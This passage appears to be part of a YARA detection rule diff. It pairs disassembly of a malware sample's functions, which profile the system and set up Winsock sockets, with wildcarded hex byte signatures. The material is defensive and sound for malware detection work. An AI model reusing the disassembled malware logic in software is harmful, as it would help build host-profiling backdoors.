[0x0040910c] + .text:0x00405310 8d9424c8000000 lea edx,dword [esp + 200] + .text:0x00405317 52 push edx + .text:0x00405318 ffd7 call edi ;kernel32.GetVersionExA(local1676) + .text:0x0040531a 6a00 push 0 + .text:0x0040531c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040531e 6a00 push 0 + .text:0x00405320 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405322 8d842454060000 lea eax,dword [esp + 1620] + .text:0x00405329 6800010000 push 256 + .text:0x0040532e 8d8c2458040000 lea ecx,dword [esp + 1112] + .text:0x00405335 50 push eax + .text:0x00405336 51 push ecx + .text:0x00405337 e8b4fdffff call 0x004050f0 ;sub_004050f0(local768,local256,256) + .text:0x0040533c 83c40c add esp,12 + .text:0x0040533f 6a00 push 0 + .text:0x00405341 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405343 33d2 xor edx,edx + .text:0x00405345 c744243410000000 mov dword [esp + 52],16 + .text:0x0040534d 89542440 mov dword [esp + 64],edx + .text:0x00405351 89542444 mov dword [esp + 68],edx + .text:0x00405355 89542448 mov dword [esp + 72],edx + .text:0x00405359 52 push edx + .text:0x0040535a 89542450 mov dword [esp + 80],edx + .text:0x0040535e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405360 8b94245c070000 mov edx,dword [esp + 1884] + .text:0x00405367 8d442434 lea eax,dword [esp + 52] + .text:0x0040536b 50 push eax + .text:0x0040536c 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00405370 8b82a8000000 mov eax,dword [edx + 168] + .text:0x00405376 51 push ecx + .text:0x00405377 50 push eax + .text:0x00405378 ff151c924000 call dword [0x0040921c] ;ws2_32.getsockname(0x61616161,local1812) + .text:0x0040537e 6a00 push 0 + .text:0x00405380 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405382 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00405386 6a04 push 4 + .text:0x00405388 8d942480010000 lea edx,dword [esp + 384] + .text:0x0040538f 51 push ecx + .text:0x00405390 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00405396 52 push edx + .text:0x00405397 e8c4f1ffff call 0x00404560 ;sub_00404560(local1500,local1812,4) + .text:0x0040539c 6a00 push 0 + .text:0x0040539e ffd6 call esi ;kernel32.Sleep(0) + .text:0x004053a0 8d842454060000 lea eax,dword [esp + 1620] + .text:0x004053a7 6a32 push 50 + .text:0x004053a9 8d8c2484010000 lea ecx,dword [esp + 388] + .text:0x004053b0 50 push eax + .text:0x004053b1 51 push ecx + .text:0x004053b2 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004053b8 e8a3f1ffff call 0x00404560 ;sub_00404560(local1496,local260,50) + .text:0x004053bd e80ef9ffff call 0x00404cd0 ;sub_00404cd0() + .text:0x004053c2 89842464010000 mov dword [esp + 356],eax + .text:0x004053c9 6a00 push 0 + .text:0x004053cb 89ac2490020000 mov dword [esp + 656],ebp + .text:0x004053d2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004053d4 8d94248c020000 lea edx,dword [esp + 652] + .text:0x004053db 52 push edx + .text:0x004053dc ffd7 call edi ;kernel32.GetVersionExA(local1228) + .text:0x004053de 6a00 push 0 + .text:0x004053e0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004053e2 8b842490020000 mov eax,dword [esp + 656] + .text:0x004053e9 8b2dd8914000 mov ebp,dword [0x004091d8] + .text:0x004053ef 83f805 cmp eax,5 + .text:0x004053f2 752a jnz 0x0040541e + .text:0x004053f4 8b842494020000 mov eax,dword [esp + 660] + .text:0x004053fb 85c0 test eax,eax + .text:0x004053fd 751f jnz 0x0040541e + .text:0x004053ff 6a00 push 0 + .text:0x00405401 c644241431 mov byte [esp + 20],49 + .text:0x00405406 c644241500 mov byte [esp + 21],0 + .text:0x0040540b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040540d 8d442410 lea eax,dword [esp + 16] + .text:0x00405411 8d8c2468010000 lea ecx,dword [esp + 360] + .text:0x00405418 50 push eax + .text:0x00405419 51 push ecx + .text:0x0040541a ffd3 call ebx ;kernel32.lstrcpyA(local1520,local1864) + .text:0x0040541c eb43 jmp 0x00405461 + .text:0x0040541e loc_0040541e: [2 XREFS] + .text:0x0040541e 6a00 push 0 + .text:0x00405420 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405422 8d9424a0000000 lea edx,dword [esp + 160] + .text:0x00405429 52 push edx + .text:0x0040542a ff1508914000 call dword [0x00409108] ;kernel32.GetSystemInfo(local1720) + .text:0x00405430 6a00 push 0 + .text:0x00405432 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405434 8b8424b4000000 mov eax,dword [esp + 180] + .text:0x0040543b 8d4c2410 lea ecx,dword [esp + 16] + .text:0x0040543f 50 push eax + .text:0x00405440 8d94246c010000 lea edx,dword [esp + 364] + .text:0x00405447 51 push ecx + .text:0x00405448 52 push edx + .text:0x00405449 c644241c25 mov byte [esp + 28],37 + .text:0x0040544e c644241d64 mov byte [esp + 29],100 + .text:0x00405453 c644241e00 mov byte [esp + 30],0 + .text:0x00405458 ffd5 call ebp ;user32.wsprintfA(local1520,local1864) + .text:0x0040545a 83c40c add esp,12 + .text:0x0040545d 6a00 push 0 + .text:0x0040545f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405461 loc_00405461: [1 XREFS] + .text:0x00405461 6a00 push 0 + .text:0x00405463 c744246440000000 mov dword [esp + 100],64 + .text:0x0040546b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040546d 8d442460 lea eax,dword [esp + 96] + .text:0x00405471 50 push eax + .text:0x00405472 ff1504914000 call dword [0x00409104] ;kernel32.GlobalMemoryStatusEx(local1784) + .text:0x00405478 6a00 push 0 + .text:0x0040547a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040547c 8b442468 mov eax,dword [esp + 104] + .text:0x00405480 8b54246c mov edx,dword [esp + 108] + .text:0x00405484 b914000000 mov ecx,20 + .text:0x00405489 e8122a0000 call 0x00407ea0 ;__aullshr(0xfefefefe,0xfefefefe,20) + .text:0x0040548e 898424b4010000 mov dword [esp + 436],eax + .text:0x00405495 c744241000000000 mov dword [esp + 16],0 + .text:0x0040549d 33db xor ebx,ebx + .text:0x0040549f loc_0040549f: [1 XREFS] + .text:0x0040549f 8acb mov cl,bl + .text:0x004054a1 6a00 push 0 + .text:0x004054a3 80c142 add cl,66 + .text:0x004054a6 c644242d3a mov byte [esp + 45],58 + .text:0x004054ab 884c242c mov byte [esp + 44],cl + .text:0x004054af c644242e5c mov byte [esp + 46],92 + .text:0x004054b4 c644242f00 mov byte [esp + 47],0 + .text:0x004054b9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054bb 8d542428 lea edx,dword [esp + 40] + .text:0x004054bf 52 push edx + .text:0x004054c0 ff1500914000 call dword [0x00409100] ;kernel32.GetDriveTypeA(local1840) + .text:0x004054c6 6a00 push 0 + .text:0x004054c8 8bf8 mov edi,eax + .text:0x004054ca ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054cc 83ff03 cmp edi,3 + .text:0x004054cf 7538 jnz 0x00405509 + .text:0x004054d1 6a00 push 0 + .text:0x004054d3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054d5 8d442450 lea eax,dword [esp + 80] + .text:0x004054d9 8d4c2438 lea ecx,dword [esp + 56] + .text:0x004054dd 50 push eax + .text:0x004054de 8d54245c lea edx,dword [esp + 92] + .text:0x004054e2 51 push ecx + .text:0x004054e3 8d442430 lea eax,dword [esp + 48] + .text:0x004054e7 52 push edx + .text:0x004054e8 50 push eax + .text:0x004054e9 ff15fc904000 call dword [0x004090fc] ;kernel32.GetDiskFreeSpaceExA(local1840,local1792,local1824,local1800) + .text:0x004054ef 6a00 push 0 + .text:0x004054f1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054f3 8b442438 mov eax,dword [esp + 56] + .text:0x004054f7 8b54243c mov edx,dword [esp + 60] + .text:0x004054fb b914000000 mov ecx,20 + .text:0x00405500 e89b290000 call 0x00407ea0 ;__aullshr(16,0xfefefefe,20) + .text:0x00405505 01442410 add dword [esp + 16],eax + .text:0x00405509 loc_00405509: [1 XREFS] + .text:0x00405509 43 inc ebx + .text:0x0040550a 83fb1a cmp ebx,26 + .text:0x0040550d 7c90 jl 0x0040549f + .text:0x0040550f 8b4c2410 mov ecx,dword [esp + 16] + .text:0x00405513 898c24b8010000 mov dword [esp + 440],ecx + .text:0x0040551a e821f9ffff call 0x00404e40 ;sub_00404e40() + .text:0x0040551f 8b942460070000 mov edx,dword [esp + 1888] + .text:0x00405526 6a00 push 0 + .text:0x00405528 898424c0010000 mov dword [esp + 448],eax + .text:0x0040552f 899424c4010000 mov dword [esp + 452],edx + .text:0x00405536 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405538 ff15d0904000 call dword [0x004090d0] ;kernel32.GetTickCount() + .text:0x0040553e 8bf8 mov edi,eax + .text:0x00405540 b83bd4b531 mov eax,0x31b5d43b + .text:0x00405545 f7e7 mul edi + .text:0x00405547 c1ea18 shr edx,24 + .text:0x0040554a 8d442414 lea eax,dword [esp + 20] + .text:0x0040554e 52 push edx + .text:0x0040554f 8d8c24f4030000 lea ecx,dword [esp + 1012] + .text:0x00405556 50 push eax + .text:0x00405557 51 push ecx + .text:0x00405558 ffd5 call ebp ;user32.wsprintfA(local872,local1860) + .text:0x0040555a 8bc7 mov eax,edi + .text:0x0040555c 33d2 xor edx,edx + .text:0x0040555e b9005c2605 mov ecx,0x05265c00 + .text:0x00405563 f7f1 div ecx + .text:0x00405565 b8b17c2195 mov eax,0x95217cb1 + .text:0x0040556a 8bfa mov edi,edx + .text:0x0040556c f7e7 mul edi + .text:0x0040556e c1ea15 shr edx,21 + .text:0x00405571 52 push edx + .text:0x00405572 8d542424 lea edx,dword [esp + 36] + .text:0x00405576 8d84249c030000 lea eax,dword [esp + 924] + .text:0x0040557d 52 push edx + .text:0x0040557e 50 push eax + .text:0x0040557f ffd5 call ebp ;user32.wsprintfA(local972,local1860) + .text:0x00405581 8bc7 mov eax,edi + .text:0x00405583 33d2 xor edx,edx + .text:0x00405585 b980ee3600 mov ecx,0x0036ee80 + .text:0x0040558a f7f1 div ecx + .text:0x0040558c b873b2e745 mov eax,0x45e7b273 + .text:0x00405591 f7e2 mul edx + .text:0x00405593 c1ea0e shr edx,14 + .text:0x00405596 52 push edx + .text:0x00405597 8d542430 lea edx,dword [esp + 48] + .text:0x0040559b 8d842444030000 lea eax,dword [esp + 836] + .text:0x004055a2 52 push edx + .text:0x004055a3 50 push eax + .text:0x004055a4 ffd5 call ebp ;user32.wsprintfA(local1072,local1860) + .text:0x004055a6 83c424 add esp,36 + .text:0x004055a9 b073 mov al,115 + .text:0x004055ab c644241825 mov byte [esp + 24],37 + .text:0x004055b0 88442419 mov byte [esp + 25],al + .text:0x004055b4 6a00 push 0 + .text:0x004055b6 c644241e25 mov byte [esp + 30],37 + .text:0x004055bb 8844241f mov byte [esp + 31],al + .text:0x004055bf c644242025 mov byte [esp + 32],37 + .text:0x004055c4 88442421 mov byte [esp + 33],al + .text:0x004055c8 c644242225 mov byte [esp + 34],37 + .text:0x004055cd 88442423 mov byte [esp + 35],al + .text:0x004055d1 c644242425 mov byte [esp + 36],37 + .text:0x004055d6 88442425 mov byte [esp + 37],al + .text:0x004055da c644242625 mov byte [esp + 38],37 + .text:0x004055df 88442427 mov byte [esp + 39],al + .text:0x004055e3 c644242800 mov byte [esp + 40],0 + .text:0x004055e8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004055ea 8d8c2428030000 lea ecx,dword [esp + 808] + .text:0x004055f1 688ca54000 push 0x0040a58c + .text:0x004055f6 51 push ecx + .text:0x004055f7 8d942494030000 lea edx,dword [esp + 916] + .text:0x004055fe 6888a54000 push 0x0040a588 + .text:0x00405603 52 push edx + .text:0x00405604 8d842400040000 lea eax,dword [esp + 1024] + .text:0x0040560b 6884a54000 push 0x0040a584 + .text:0x00405610 8d4c242c lea ecx,dword [esp + 44] + .text:0x00405614 50 push eax + .text:0x00405615 8d942472020000 lea edx,dword [esp + 626] + .text:0x0040561c 51 push ecx + .text:0x0040561d 52 push edx + .text:0x0040561e ffd5 call ebp ;user32.wsprintfA(local1278,local1856) + .text:0x00405620 83c420 add esp,32 + .text:0x00405623 6a00 push 0 + .text:0x00405625 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405627 8b842464070000 mov eax,dword [esp + 1892] + .text:0x0040562e 8d8c24c4010000 lea ecx,dword [esp + 452] + .text:0x00405635 50 push eax + .text:0x00405636 51 push ecx + .text:0x00405637 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040563d e82ef1ffff call 0x00404770 ;sub_00404770(local1428,arg2) + .text:0x00405642 6a00 push 0 + .text:0x00405644 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405646 8d9424f6010000 lea edx,dword [esp + 502] + .text:0x0040564d 6a32 push 50 + .text:0x0040564f 8d842458040000 lea eax,dword [esp + 1112] + .text:0x00405656 52 push edx + .text:0x00405657 50 push eax + .text:0x00405658 e8b3fbffff call 0x00405210 ;sub_00405210(local772,local1378,50) + .text:0x0040565d 83c40c add esp,12 + .text:0x00405660 6a00 push 0 + .text:0x00405662 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405664 8d8c2454050000 lea ecx,dword [esp + 1364] + .text:0x0040566b 6800010000 push 256 + .text:0x00405670 8d942458040000 lea edx,dword [esp + 1112] + .text:0x00405677 51 push ecx + .text:0x00405678 52 push edx + .text:0x00405679 e8f2faffff call 0x00405170 ;sub_00405170(local516,local772,local516,256) + .text:0x0040567e 83c40c add esp,12 + .text:0x00405681 bf70a54000 mov edi,0x0040a570 + .text:0x00405686 85c0 test eax,eax + .text:0x00405688 7407 jz 0x00405691 + .text:0x0040568a 8dbc2454050000 lea edi,dword [esp + 1364] + .text:0x00405691 loc_00405691: [1 XREFS] + .text:0x00405691 6a00 push 0 + .text:0x00405693 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405695 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040569b 8d842428020000 lea eax,dword [esp + 552] + .text:0x004056a2 57 push edi + .text:0x004056a3 50 push eax + .text:0x004056a4 e8c7f0ffff call 0x00404770 ;sub_00404770(local1328,0x0040a570) + .text:0x004056a9 6a00 push 0 + .text:0x004056ab ffd6 call esi ;kernel32.Sleep(0) + .text:0x004056ad 8d8c24c4000000 lea ecx,dword [esp + 196] + .text:0x004056b4 68c8010000 push 456 + .text:0x004056b9 51 push ecx + .text:0x004056ba 8b8c2464070000 mov ecx,dword [esp + 1892] + .text:0x004056c1 e88acbffff call 0x00402250 ;sub_00402250(arg0,local1684,456) + .text:0x004056c6 6a00 push 0 + .text:0x004056c8 8bf8 mov edi,eax + .text:0x004056ca ffd6 call esi ;kernel32.Sleep(0) + .text:0x004056cc 8bc7 mov eax,edi + .text:0x004056ce 5f pop edi + .text:0x004056cf 5e pop esi + .text:0x004056d0 5d pop ebp + .text:0x004056d1 5b pop ebx + .text:0x004056d2 81c444070000 add esp,1860 + .text:0x004056d8 c3 ret + */ + $c25 = { 81 EC 44 07 00 00 53 55 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 6A 00 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 00 FF D6 6A 00 C6 84 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? 00 00 00 00 FF D6 BD 9C 00 00 00 6A 00 89 AC 24 ?? ?? ?? ?? FF D6 8B 84 24 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 51 FF D3 6A 00 FF D6 8B 3D ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 6A 00 FF D6 6A 00 FF D6 8D 84 24 ?? ?? ?? ?? 68 00 01 00 00 8D 8C 24 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 33 D2 C7 44 24 ?? 10 00 00 00 89 54 24 ?? 89 54 24 ?? 89 54 24 ?? 52 89 54 24 ?? FF D6 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C 24 ?? 8B 82 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8D 4C 24 ?? 6A 04 8D 94 24 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A 00 FF D6 8D 84 24 ?? ?? ?? ?? 6A 32 8D 8C 24 ?? ?? ?? ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 6A 00 89 AC 24 ?? ?? ?? ?? FF D6 8D 94 24 ?? ?? ?? ?? 52 FF D7 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 F8 05 75 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 6A 00 C6 44 24 ?? 31 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 51 FF D3 EB ?? 6A 00 FF D6 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 00 FF D5 83 C4 0C 6A 00 FF D6 6A 00 C7 44 24 ?? 40 00 00 00 FF D6 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 44 24 ?? 8B 54 24 ?? B9 14 00 00 00 E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 33 DB 8A CB 6A 00 80 C1 42 C6 44 24 ?? 3A 88 4C 24 ?? C6 44 24 ?? 5C C6 44 24 ?? 00 FF D6 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 83 FF 03 75 ?? 6A 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 8D 44 24 ?? 52 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 44 24 ?? 8B 54 24 ?? B9 14 00 00 00 E8 ?? ?? ?? ?? 01 44 24 ?? 43 83 FB 1A 7C ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 6A 00 89 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? FF D6 FF 15 ?? ?? ?? ?? 8B F8 B8 3B D4 B5 31 F7 E7 C1 EA 18 8D 44 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 50 51 FF D5 8B C7 33 D2 B9 00 5C 26 05 F7 F1 B8 B1 7C 21 95 8B FA F7 E7 C1 EA 15 52 8D 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 50 FF D5 8B C7 33 D2 B9 80 EE 36 00 F7 F1 B8 73 B2 E7 45 F7 E2 C1 EA 0E 52 8D 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 50 FF D5 83 C4 24 B0 73 C6 44 24 ?? 25 88 44 24 ?? 6A 00 C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 00 FF D6 8D 8C 24 ?? ?? ?? ?? 68 8C A5 40 00 51 8D 94 24 ?? ?? ?? ?? 68 88 A5 40 00 52 8D 84 24 ?? ?? ?? ?? 68 84 A5 40 00 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 FF D5 83 C4 20 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8D 94 24 ?? ?? ?? ?? 6A 32 8D 84 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 8D 8C 24 ?? ?? ?? ?? 68 00 01 00 00 8D 94 24 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 0C BF 70 A5 40 00 85 C0 74 ?? 8D BC 24 ?? ?? ?? ?? 6A 00 FF D6 8B 0D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 6A 00 FF D6 8D 8C 24 ?? ?? ?? ?? 68 C8 01 00 00 51 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8B C7 5F 5E 5D 5B 81 C4 44 07 00 00 C3 } + /* +function at 0x00401610@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - initialize Winsock library + .text:0x00401610 + .text:0x00401610 FUNC: int thiscall sub_00401610( void * ecx, ) [4 XREFS] + .text:0x00401610 + .text:0x00401610 Stack Variables: (offset from initial top of stack) + .text:0x00401610 -4: int local4 + .text:0x00401610 -12: int local12 + .text:0x00401610 -412: int local412 + .text:0x00401610 -416: int local416 + .text:0x00401610 -420: int local420 + .text:0x00401610 -421: int local421 + .text:0x00401610 -422: int local422 + .text:0x00401610 -423: int local423 + .text:0x00401610 -424: int local424 + .text:0x00401610 + .text:0x00401610 6aff push 0xffffffff + .text:0x00401612 6848834000 push 0x00408348 + .text:0x00401617 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x0040161d 50 push eax + .text:0x0040161e 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00401625 81ec9c010000 sub esp,412 + .text:0x0040162b 56 push esi + .text:0x0040162c 8bf1 mov esi,ecx + .text:0x0040162e 8974240c mov dword [esp + 12],esi + .text:0x00401632 8d4e04 lea ecx,dword [esi + 4] + .text:0x00401635 e8c6f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040163a 8d4e2c lea ecx,dword [esi + 44] + .text:0x0040163d c78424a801000000 mov dword [esp + 424],0 + .text:0x00401648 e8b3f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040164d 8d4e54 lea ecx,dword [esi + 84] + .text:0x00401650 c68424a801000001 mov byte [esp + 424],1 + .text:0x00401658 e8a3f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040165d 8d4e7c lea ecx,dword [esi + 124] + .text:0x00401660 c68424a801000002 mov byte [esp + 424],2 + .text:0x00401668 e893f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040166d 8d442410 lea eax,dword [esp + 16] + .text:0x00401671 c68424a801000003 mov byte [esp + 424],3 + .text:0x00401679 50 push eax + .text:0x0040167a 6802020000 push 514 + .text:0x0040167f c70668924000 mov dword [esi],0x00409268 + .text:0x00401685 ff1528924000 call dword [0x00409228] ;ws2_32.WSAStartup(514,local412) + .text:0x0040168b 6a00 push 0 + .text:0x0040168d 6a00 push 0 + .text:0x0040168f 6a01 push 1 + .text:0x00401691 6a00 push 0 + .text:0x00401693 ff1584904000 call dword [0x00409084] ;kernel32.CreateEventA(0,1,0,0) + .text:0x00401699 8d4c2404 lea ecx,dword [esp + 4] + .text:0x0040169d 8986ac000000 mov dword [esi + 172],eax + .text:0x004016a3 6a05 push 5 + .text:0x004016a5 c686b000000000 mov byte [esi + 176],0 + .text:0x004016ac c786a8000000ffff mov dword [esi + 168],0xffffffff + .text:0x004016b6 b075 mov al,117 + .text:0x004016b8 51 push ecx + .text:0x004016b9 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004016bf 6894a54000 push 0x0040a594 + .text:0x004016c4 c64424104b mov byte [esp + 16],75 + .text:0x004016c9 88442411 mov byte [esp + 17],al + .text:0x004016cd c644241247 mov byte [esp + 18],71 + .text:0x004016d2 c64424136f mov byte [esp + 19],111 + .text:0x004016d7 88442414 mov byte [esp + 20],al + .text:0x004016db e8802e0000 call 0x00404560 ;sub_00404560(0x0040a594,local424,5) + .text:0x004016e0 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004016e6 6834ac4000 push 0x0040ac34 + .text:0x004016eb e800300000 call 0x004046f0 ;sub_004046f0(0x0040ac34) + .text:0x004016f0 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004016f6 50 push eax + .text:0x004016f7 6834ac4000 push 0x0040ac34 + .text:0x004016fc 68a0a74000 push 0x0040a7a0 + .text:0x00401701 e84a320000 call 0x00404950 ;sub_00404950(0x0040a7a0,0x0040ac34,sub_004046f0(0x0040ac34)) + .text:0x00401706 8b8c24a0010000 mov ecx,dword [esp + 416] + .text:0x0040170d 8bc6 mov eax,esi + .text:0x0040170f 5e pop esi + .text:0x00401710 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00401717 81c4a8010000 add esp,424 + .text:0x0040171d c3 ret + */ + $c26 = { 6A FF 68 48 83 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC 9C 01 00 00 56 8B F1 89 74 24 ?? 8D 4E ?? E8 ?? ?? ?? ?? 8D 4E ?? C7 84 24 ?? ?? ?? ?? 00 00 00 00 E8 ?? ?? ?? ?? 8D 4E ?? C6 84 24 ?? ?? ?? ?? 01 E8 ?? ?? ?? ?? 8D 4E ?? C6 84 24 ?? ?? ?? ?? 02 E8 ?? ?? ?? ?? 8D 44 24 ?? C6 84 24 ?? ?? ?? ?? 03 50 68 02 02 00 00 C7 06 68 92 40 00 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 01 6A 00 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 86 ?? ?? ?? ?? 6A 05 C6 86 ?? ?? ?? ?? 00 C7 86 ?? ?? ?? ?? FF FF FF FF B0 75 51 8B 0D ?? ?? ?? ?? 68 94 A5 40 00 C6 44 24 ?? 4B 88 44 24 ?? C6 44 24 ?? 47 C6 44 24 ?? 6F 88 44 24 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 34 AC 40 00 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 68 34 AC 40 00 68 A0 A7 40 00 E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B C6 5E 64 89 0D ?? ?? ?? ?? 81 C4 A8 01 00 00 C3 } + /* +function at 0x004021b0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - set socket configuration + .text:0x004021b0 + .text:0x004021b0 FUNC: int thiscall_caller sub_004021b0( void * ecx, ) [12 XREFS] + .text:0x004021b0 + .text:0x004021b0 Stack Variables: (offset from initial top of stack) + .text:0x004021b0 -2: int local2 + .text:0x004021b0 -4: int local4 + .text:0x004021b0 + .text:0x004021b0 51 push ecx + .text:0x004021b1 56 push esi + .text:0x004021b2 57 push edi + .text:0x004021b3 8b3d78904000 mov edi,dword [0x00409078] + .text:0x004021b9 8bf1 mov esi,ecx + .text:0x004021bb 6a00 push 0 + .text:0x004021bd ffd7 call edi ;kernel32.Sleep(0) + .text:0x004021bf 6a00 push 0 + .text:0x004021c1 66c744240c0100 mov word [esp + 12],1 + .text:0x004021c8 66c744240e0000 mov word [esp + 14],0 + .text:0x004021cf ffd7 call edi ;kernel32.Sleep(0) + .text:0x004021d1 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x004021d7 8d442408 lea eax,dword [esp + 8] + .text:0x004021db 6a04 push 4 + .text:0x004021dd 50 push eax + .text:0x004021de 6880000000 push 128 + .text:0x004021e3 68ffff0000 push 0x0000ffff + .text:0x004021e8 51 push ecx + .text:0x004021e9 ff152c924000 call dword [0x0040922c] ;ws2_32.setsockopt(0x61616161,0x0000ffff,128,local4) + .text:0x004021ef 6a00 push 0 + .text:0x004021f1 ffd7 call edi ;kernel32.Sleep(0) + .text:0x004021f3 8b96a8000000 mov edx,dword [esi + 168] + .text:0x004021f9 52 push edx + .text:0x004021fa ff15a0904000 call dword [0x004090a0] ;kernel32.CancelIo(0x61616161) + .text:0x00402200 6a00 push 0 + .text:0x00402202 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402204 8d86b0000000 lea eax,dword [esi + 176] + .text:0x0040220a 6a00 push 0 + .text:0x0040220c 50 push eax + .text:0x0040220d ff159c904000 call dword [0x0040909c] ;kernel32.InterlockedExchange(ecx,0) + .text:0x00402213 6a00 push 0 + .text:0x00402215 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402217 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x0040221d 51 push ecx + .text:0x0040221e ff1504924000 call dword [0x00409204] ;ws2_32.closesocket(0x61616161) + .text:0x00402224 6a00 push 0 + .text:0x00402226 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402228 8b96ac000000 mov edx,dword [esi + 172] + .text:0x0040222e 52 push edx + .text:0x0040222f ff1598904000 call dword [0x00409098] ;kernel32.SetEvent(0x61616161) + .text:0x00402235 6a00 push 0 + .text:0x00402237 ffd7 call edi ;kernel32.Sleep(0) + .text:0x00402239 c786a8000000ffff mov dword [esi + 168],0xffffffff + .text:0x00402243 5f pop edi + .text:0x00402244 5e pop esi + .text:0x00402245 59 pop ecx + .text:0x00402246 c3 ret + */ + $c27 = { 51 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A 00 FF D7 6A 00 66 C7 44 24 ?? 01 00 66 C7 44 24 ?? 00 00 FF D7 8B 8E ?? ?? ?? ?? 8D 44 24 ?? 6A 04 50 68 80 00 00 00 68 FF FF 00 00 51 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 96 